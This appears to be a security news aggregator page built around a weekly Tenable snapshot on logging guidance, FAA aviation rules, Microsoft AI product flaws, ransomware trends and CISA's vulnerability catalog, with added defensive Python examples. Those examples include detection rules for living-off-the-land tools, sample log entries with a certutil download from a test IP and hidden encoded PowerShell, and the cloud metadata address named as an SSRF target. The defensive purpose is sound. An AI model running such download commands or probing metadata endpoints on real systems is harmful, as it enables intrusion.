Aggregator
C-Suite Involvement in Cybersecurity Is Little More Than Lip Service
CVE-2024-28987: critical threat in SolarWinds WHD requires urgent action
Russian laundering millions for Lazarus hackers arrested in Argentina
Georgia Tech Sued Over Cybersecurity Violations
NTLM Credential Theft in Python Windows Applications
This post walks through the vulnerabilities we disclosed affecting Gradio, and our work with Hugging Face to harden the Spaces platform after a recently reported potential breach.
The post NTLM Credential Theft in Python Windows Applications appeared first on Horizon3.ai.
Zr.Ms. Karel Doorman returns from its mission in the Red Sea
More From Our Main Blog: The Good, the Bad and the Ugly in Cybersecurity – Week 34
Authorities nab crypto and extortion criminals, cloud hacktool identified in spam SMS attacks, and DPRK actors exploit Windows zero-day.
The post The Good, the Bad and the Ugly in Cybersecurity – Week 34 appeared first on SentinelOne.
Cybersecurity Snapshot: Guide Unpacks Event-Logging Best Practices, as FAA Proposes Stronger Cyber Rules for Airplanes
Looking to sharpen your team’s event logging and threat detection? A new guide offers plenty of best practices. Plus, the FAA wants airplanes to be more resilient to cyberattacks. Meanwhile, check out the critical vulnerabilities Tenable discovered in two Microsoft AI products. And get the latest on ransomware trends, vulnerability management practices and election security!
Dive into six things that are top of mind for the week ending August 23.
1 - Guide outlines logging and threat detection best practices
As attackers double down on the use of stealthy, hard-to-detect “living off the land” (LOTL) techniques, cybersecurity teams should improve how they log events and detect threats. That’s the call government agencies from multiple countries made in a joint guide published this week and titled “Best Practices for Event Logging and Threat Detection.”
“Event logging supports the continued delivery of operations and improves the security and resilience of critical systems by enabling network visibility,” reads the guide, which was developed by the Australian Cyber Security Centre (ACSC).
The guide, whose intended audience includes senior IT and operational technology (OT) leaders and operators, network administrators and critical infrastructure providers, groups its best practices under four categories:
- Enterprise-approved event logging policy, which includes event-log quality and the consistency of content, formats and timestamps
- Centralized log collection and correlation, which focuses on logging priorities for enterprise networks, OT systems, mobile devices and cloud environments
- Secure storage and event-log integrity, which touches on protecting logs from unauthorized access, modification and deletion
- Detection strategy for relevant threats, which deals with LOTL techniques, such as attackers’ use of legitimate tools and capabilities in the breached environment
The guide’s recommendations can help “detect malicious activity, behavioral anomalies, and compromised networks, devices, or accounts,” reads a statement from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which collaborated with the ACSC, along with cyber agencies from seven other countries.
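The four categories above combine naturally in code: consistent UTC timestamps in a layout a central collector can correlate on, a tamper-evident chain that makes modification or deletion of stored records detectable, and detection rules for LOTL command lines. The Python below is an added example written for this summary, not code from the guide or from any of the agencies behind it; the field names, the HMAC key, the sample records and the four LOTL patterns are all constructed for illustration.

```python
import hashlib
import hmac
import json
import re
from datetime import datetime, timedelta, timezone

# Constructed example (not from the guide): a JSON Lines event log with UTC ISO 8601
# timestamps, an HMAC-keyed hash chain linking each record to the previous one, and a
# small "living off the land" detector run over the resulting records.

CHAIN_KEY = b"assumed-secret-held-by-the-central-collector"  # placeholder, not a real key


def _digest(prev_hash: str, body: dict) -> str:
    # Canonical JSON so that producer and verifier hash byte-identical input.
    canonical = json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(CHAIN_KEY, prev_hash.encode() + canonical, hashlib.sha256).hexdigest()


def append_event(log: list, host: str, user: str, process: str, cmdline: str, ts=None) -> dict:
    body = {
        "ts": (ts or datetime.now(timezone.utc)).isoformat(timespec="milliseconds"),
        "host": host, "user": user, "process": process, "cmdline": cmdline,
    }
    prev = log[-1]["hash"] if log else "0" * 64  # genesis value for an empty log
    record = dict(body, prev=prev, hash=_digest(prev, body))
    log.append(record)
    return record


def verify_chain(log: list) -> tuple:
    """Return (ok, index_of_first_bad_record). Edits, deletions and reordering all break the chain."""
    prev = "0" * 64
    for i, rec in enumerate(log):
        body = {k: v for k, v in rec.items() if k not in ("prev", "hash")}
        if rec["prev"] != prev or rec["hash"] != _digest(prev, body):
            return False, i
        prev = rec["hash"]
    return True, -1


# Deliberately narrow LOTL patterns: built-in Windows tools used for download or
# obfuscated execution. Real detection content would also key on parent process,
# user context and frequency.
LOTL_RULES = {
    "certutil_download": re.compile(r"certutil(\.exe)?\s.*-urlcache", re.I),
    "encoded_powershell": re.compile(r"powershell(\.exe)?\s.*-(e|ec|enc|encodedcommand)\b", re.I),
    "mshta_remote": re.compile(r"mshta(\.exe)?\s+https?://", re.I),
    "bitsadmin_transfer": re.compile(r"bitsadmin(\.exe)?\s.*/transfer", re.I),
}


def detect_lotl(log: list) -> list:
    hits = []
    for rec in log:
        for name, rx in LOTL_RULES.items():
            if rx.search(rec["cmdline"]):
                hits.append((name, rec["ts"], rec["host"], rec["user"]))
    return hits


def build_sample_log() -> list:
    """Constructed process-creation events; hosts, users and addresses are fictitious."""
    t0 = datetime(2024, 8, 23, 14, 5, 0, tzinfo=timezone.utc)
    log = []
    append_event(log, "ws-17", "jdoe", "explorer.exe", "C:\\Windows\\explorer.exe", t0)
    append_event(log, "ws-17", "jdoe", "certutil.exe",
                 "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.txt",
                 t0 + timedelta(seconds=40))
    append_event(log, "ws-17", "jdoe", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgA", t0 + timedelta(seconds=55))
    append_event(log, "srv-02", "svc_backup", "robocopy.exe",
                 "robocopy.exe D:\\data \\\\nas\\backup /MIR", t0 + timedelta(minutes=3))
    return log


if __name__ == "__main__":
    events = build_sample_log()
    print("chain intact:", verify_chain(events))
    for hit in detect_lotl(events):
        print("LOTL hit:", hit)
    events[1]["cmdline"] = "certutil.exe -hashfile a.txt"  # simulate an attacker editing a record
    print("after tampering:", verify_chain(events))
```

The key, and therefore `verify_chain`, belongs on the central collector rather than on the producing host: an attacker who can edit or delete log lines on a breached endpoint cannot recompute the chain without it, which is what makes the modification or deletion visible downstream.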
To get more details, check out:
- CISA’s announcement
- The full 17-page guide “Best Practices for Event Logging and Threat Detection”
For more information about event logging and threat detection:
- “Security log management and logging best practices” (TechTarget)
- “Logging Cheat Sheet” (OWASP)
- “Network security logging and monitoring” (Canadian Centre for Cyber Security)
- “Introduction to logging for security purposes” (U.K. NCSC)
2 - FAA proposes cybersecurity rules for airplanes, engines and propellers
To beef up the aviation sector’s cyber defenses, the U.S. government this week proposed new cybersecurity rules for airplanes, engines and propellers as they become increasingly connected to computer networks and services.
In a proposed rulemaking notice, the U.S. Federal Aviation Administration (FAA) said some of its regulations are “inadequate and inappropriate to address the cybersecurity vulnerabilities caused by increased interconnectivity.”
Current airplane designs can expose them to cyber risks from maintenance laptops; airport or airline networks; the internet; wireless sensors and their networks; USB devices; cellular and satellite systems and communications; and more.
The proposed new and revised rules seek to protect airplanes, engines and propellers from “intentional unauthorized electronic interactions” (IUEI). The FAA wants to require product designers and manufacturers to “identify” and “assess” IUEI risks and to mitigate them.
To that end, they would need to conduct a security risk analysis that identifies the applicable cyberthreats, assesses their severity, determines the likelihood of exploitation and mitigates the resulting security issues.
The proposed rules are now open for public comment.
To get more details, check out the 36-page notice of proposed rulemaking titled “Equipment, Systems, and Network Information Security Protection.”
For more information about aviation cybersecurity:
- “TSA, FAA Requirements Emphasize Cybersecurity for Airport and Aircraft Operators and Airport Terminal Projects” (Tenable)
- “Aviation Cybersecurity: Risks and Mitigations” (National Business Aviation Association)
- “Why aviation needs to prioritise cybersecurity” (Airport World)
- “Protecting The Aviation Sector From Cyberattacks” (Tenable)
3 - Tenable discovers critical vulnerabilities in two Microsoft AI products
Tenable Research recently discovered critical vulnerabilities in Microsoft’s Azure Health Bot Service and Copilot Studio.
In the case of Azure Health Bot Service, a cloud platform for deploying AI-powered virtual health assistants, the critical vulnerabilities allowed researchers access to cross-tenant resources within this service.
Meanwhile, a server-side request forgery (SSRF) vulnerability in Copilot Studio allowed researchers access to potentially sensitive information regarding service internals with potential cross-tenant impact. With Copilot Studio, you can build custom Copilot conversational applications for performing large language model (LLM) and generative AI tasks.
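This page reports the Copilot Studio SSRF without describing its mechanics, so what follows is a generic illustration rather than a reconstruction of that bug: an added Python example, not Tenable’s or Microsoft’s code, of the destination check a server-side fetch should perform before issuing a request, including re-validating every redirect hop. The hostnames, the DNS table and the redirect map are constructed so the example runs offline; 169.254.169.254 is the well-known cloud instance-metadata address and is used here only as a representative SSRF target.

```python
import ipaddress
from urllib.parse import urlparse

# Added example (not Tenable's or Microsoft's code): validate where a server-side
# HTTP request is about to go. DNS resolution is injected so it runs offline against a
# constructed table; in production, resolve and connect to the same address.

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

# Deny-list of non-public ranges. 169.254.0.0/16 covers the instance-metadata endpoint
# at 169.254.169.254; ::ffff:0:0/96 catches IPv4-mapped IPv6 forms of the same addresses.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10", "::ffff:0:0/96",
)]

# Constructed DNS answers (assumption, not real records).
CONSTRUCTED_DNS = {
    "api.example.com": ["203.0.113.10"],
    "metadata.internal.example": ["169.254.169.254"],   # alias pointing at metadata
    "dual.example.com": ["203.0.113.20", "10.0.0.5"],  # one public and one private answer
}

# Constructed redirect map standing in for a Location header on the first URL.
CONSTRUCTED_REDIRECTS = {
    "https://api.example.com/go": "http://metadata.internal.example/metadata/instance",
}


def resolve(host: str) -> list:
    return CONSTRUCTED_DNS.get(host, [])


def _is_blocked(ip) -> bool:
    if ip.version == 6 and ip.ipv4_mapped:
        ip = ip.ipv4_mapped
    return ip.is_multicast or ip.is_reserved or any(ip in net for net in BLOCKED_NETWORKS)


def check_destination(url: str, resolver=resolve) -> tuple:
    """Return (allowed, reason). Every resolved address must be public, not just the first."""
    try:
        p = urlparse(url)
        port = p.port
    except ValueError as e:
        return False, f"unparseable: {e}"
    if p.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {p.scheme!r} not allowed"
    if p.username or p.password:
        return False, "credentials in URL"
    host = p.hostname
    if not host:
        return False, "no host"
    port = port or (443 if p.scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    # Literal IPs are checked directly. Odd literal forms that ipaddress rejects
    # (decimal, octal) fall through to the resolver, which has no entry for them.
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolver(host)]
    if not addrs:
        return False, f"{host} does not resolve"
    for ip in addrs:
        if _is_blocked(ip):
            return False, f"{host} -> {ip} is not a public address"
    return True, f"{host} -> {addrs[0]}"


def fetch_with_checks(url: str, redirects=CONSTRUCTED_REDIRECTS, max_hops: int = 3) -> tuple:
    """Validate every hop of a redirect chain instead of only the first URL."""
    hops = []
    for _ in range(max_hops + 1):
        ok, why = check_destination(url)
        hops.append(f"{url}: {why}")
        if not ok:
            return False, hops
        nxt = redirects.get(url)
        if nxt is None:
            return True, hops
        url = nxt
    hops.append("too many redirects")
    return False, hops


if __name__ == "__main__":
    for u in ("https://api.example.com/v1", "http://169.254.169.254/metadata/instance",
              "https://dual.example.com/", "https://api.example.com/go"):
        print(u, "->", fetch_with_checks(u))
```

Two design points matter more than the list of ranges: the check runs on the resolved addresses, all of them, so a hostname with one public and one private answer is refused; and redirects are re-validated per hop, since an allowed public host that redirects to an internal address is the classic way past a first-URL-only check. A strict allow-list of destination hosts is stronger still where the feature permits it.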
To get all the details, read these Tenable blogs:
- “SSRFing the Web with the Help of Copilot Studio”
- “Compromising Microsoft's AI Healthcare Chatbot Service”
You can also find media coverage of the two discoveries here:
Copilot Studio
- “Microsoft Copilot Studio Exploit Leaks Sensitive Cloud Data” (Dark Reading)
- “Microsoft Copilot Studio Vulnerability Led to Information Disclosure” (SecurityWeek)
- “Microsoft Patches Critical Copilot Studio Vulnerability Exposing Sensitive Data” (The Hacker News)
Azure Health Bot Service
- “Microsoft's AI Health Bot required patching for privilege vulnerability” (Healthcare IT News)
- “Fix for Azure Health Bot vulnerabilities prevents exploitation” (TechTarget)
- “Microsoft Azure AI Health Bot Infected With Critical Vulnerabilities” (Dark Reading)
4 - Tenable poll: vulnerability management challenges and patching prioritization
During our recent webinar “From Frustration to Efficiency: Optimize Your Vuln Management Workflows and Security with Tenable,” we polled attendees on their biggest VM challenge and on patching prioritization. Check out what they said!
(Poll results chart: 231 webinar attendees polled by Tenable, August 2024)
(Poll results chart: 234 webinar attendees polled by Tenable, August 2024)
Want to learn how to improve key vulnerability management practices, including remediation prioritization? Watch this on-demand webinar “From Frustration to Efficiency: Optimize Your Vuln Management Workflows and Security with Tenable.”
5 - Report: Ransomware attacks jumped in July, as attackers turn to infostealer malware
Ransomware attacks spiked 20% globally in July, compared with June, as the RansomHub gang emerged as the most active group.
However, ransomware attacks were down compared with July 2023, and “remain much lower” compared with the activity observed between February to May of this year.
That’s according to the “Monthly Threat Pulse” report for July 2024, published this week by NCC Group’s Global Threat Intelligence team.
“Whether this increase reflects the start of an upward trend remains to be seen,” the report reads.
(Chart: Global Ransomware Attacks by Month 2023 - 2024. Source: “Monthly Threat Pulse” report from NCC Group, August 2024)
The industrials sector was the hardest hit, receiving about a third of all attacks, a clear sign of ransomware groups’ strong interest in breaching critical-infrastructure organizations, the report says.
Ransomware groups pounced on CVE-2024-37085, an authentication-bypass vulnerability in the VMware ESXi hypervisor product, a reminder that organizations need to continue to prioritize patching high-risk bugs.
While vulnerability exploitation remains a popular tactic for ransomware attackers, they’re also increasing their use of information stealer malware, which offers them a “far easier, faster and often cheaper” way to access a network via the use of stolen credentials, the report reads.
“The rise in sophisticated techniques, such as the use of information stealer malware in their pre-attack phase, highlights that cybercriminals are not standing still. As these threats evolve, so must our defences,” Ian Usher, Deputy Head of Threat Intelligence at NCC Group, said in a statement.
To get more details, check out:
- The report’s announcement
- The “Monthly Threat Pulse Review of July 2024”
For more information about ransomware trends:
- “Ransomware Is ‘More Brutal’ Than Ever in 2024” (Wired)
- “Ransomware on track for record profits, even as fewer victims pay” (SC Magazine)
- “Ransom recovery costs reach $2.73 million” (Help Net Security)
- “Ransomware report finds 43% of data unrecoverable after attack” (SC Magazine)
6 - CISA, FBI: Ransomware won’t compromise the integrity of the U.S. election
Although ransomware gangs may try to disrupt the U.S. general election, their attacks won’t compromise the voting and counting processes, according to CISA and the FBI. At most, ransomware attacks would cause isolated delays and be minimally disruptive.
“The public should be aware that ransomware is extremely unlikely to affect the integrity of voting systems or the electoral process,” FBI Cyber Division Deputy Assistant Director Cynthia Kaiser said in a statement.
The reason: U.S. election officials have put in place what CISA and the FBI call a “multi-layer approach to security” with a variety of technical, physical and procedural safeguards.
“In the event of a ransomware event affecting their offices, election officials have plans and redundancies in place to allow voting operations to continue so that all eligible voters are able to cast their ballot securely,” reads a joint public-service announcement from CISA and the FBI.
To get more details, check out:
Greasy Opal's CAPTCHA solver still serving cybercrime after 16 years
Lilith RAT: a rat from the accounting department is hunting your data
Global sea level reaches its highest point on record
G.O.S.S.I.P reading recommendation 2024-08-23: All Your Tokens are Belong to Us
Recent IOCs worth watching (2024-08-23)
Weekly advanced threat intelligence digest (2024.08.16~08.22)
Old gods and new idols: unexpected leaders in the programming language rankings
PEAKLIGHT: watching a pirated movie can cost you all your data
CISA Adds One Known Exploited Vulnerability to Catalog for Versa Networks Director
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
- CVE-2024-39717 Versa Director Dangerous File Type Upload Vulnerability
These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.
Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.
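In practice, prioritizing Catalog vulnerabilities means joining the KEV feed against an asset inventory and working the result by due date. The Python below is an added example, not CISA tooling: it parses a document in the shape of CISA’s published known_exploited_vulnerabilities.json (the field names match that file) and cross-references it with a constructed inventory. The two-entry catalog excerpt, its dates and the inventory are sample data; the live catalog is the authority for what is actually listed and when it is due.

```python
import json
from datetime import date

# Added example (not CISA's code). KEV_SAMPLE is a constructed two-record excerpt in
# the shape of CISA's known_exploited_vulnerabilities.json; the dates and ransomware
# flags are illustrative values, not an authoritative copy of the catalog.
KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "2024.08.23",
    "count": 2,
    "vulnerabilities": [
        {"cveID": "CVE-2024-39717", "vendorProject": "Versa", "product": "Director",
         "vulnerabilityName": "Versa Director Dangerous File Type Upload Vulnerability",
         "dateAdded": "2024-08-23", "dueDate": "2024-09-13",
         "requiredAction": "Apply mitigations per vendor instructions or discontinue use "
                           "of the product if mitigations are unavailable.",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2024-37085", "vendorProject": "VMware", "product": "ESXi",
         "vulnerabilityName": "VMware ESXi Authentication Bypass Vulnerability",
         "dateAdded": "2024-07-30", "dueDate": "2024-08-20",
         "requiredAction": "Apply mitigations per vendor instructions or discontinue use "
                           "of the product if mitigations are unavailable.",
         "knownRansomwareCampaignUse": "Known"},
    ],
})

# Constructed inventory: asset names and scanner findings are fictitious. CVEs that
# are not in the catalog excerpt above are simply not part of the KEV worklist.
INVENTORY = [
    {"asset": "versa-dir-01", "cves": {"CVE-2024-39717"}},
    {"asset": "esx-host-07", "cves": {"CVE-2024-37085", "CVE-2023-20867"}},
    {"asset": "web-fe-02", "cves": {"CVE-2023-44487"}},
]


def load_kev(raw: str) -> dict:
    """Index catalog entries by CVE ID."""
    doc = json.loads(raw)
    return {v["cveID"]: v for v in doc["vulnerabilities"]}


def kev_worklist(kev: dict, inventory: list, as_of: date) -> list:
    """Assets carrying a catalog CVE, ordered by due date; overdue items carry a flag."""
    work = []
    for host in inventory:
        for cve in sorted(host["cves"] & set(kev)):
            entry = kev[cve]
            due = date.fromisoformat(entry["dueDate"])
            work.append({
                "asset": host["asset"],
                "cve": cve,
                "name": entry["vulnerabilityName"],
                "ransomware": entry["knownRansomwareCampaignUse"] == "Known",
                "due": due,
                "days_left": (due - as_of).days,
                "overdue": due < as_of,
                "action": entry["requiredAction"],
            })
    # Earliest due date first; within a date, ransomware-linked CVEs first.
    work.sort(key=lambda w: (w["due"], not w["ransomware"], w["asset"]))
    return work


def overdue_count(work: list) -> int:
    return sum(1 for w in work if w["overdue"])


if __name__ == "__main__":
    catalog = load_kev(KEV_SAMPLE)
    for item in kev_worklist(catalog, INVENTORY, date(2024, 8, 23)):
        state = "OVERDUE" if item["overdue"] else f"{item['days_left']} days left"
        print(f"{item['asset']:14} {item['cve']:16} due {item['due']} ({state})")
```

Two practical notes: the join should run against the full catalog download, not a hand-maintained subset, and the due date is a floor for FCEB agencies, not a target; a catalog CVE on an internet-facing asset is already under active exploitation when it is added.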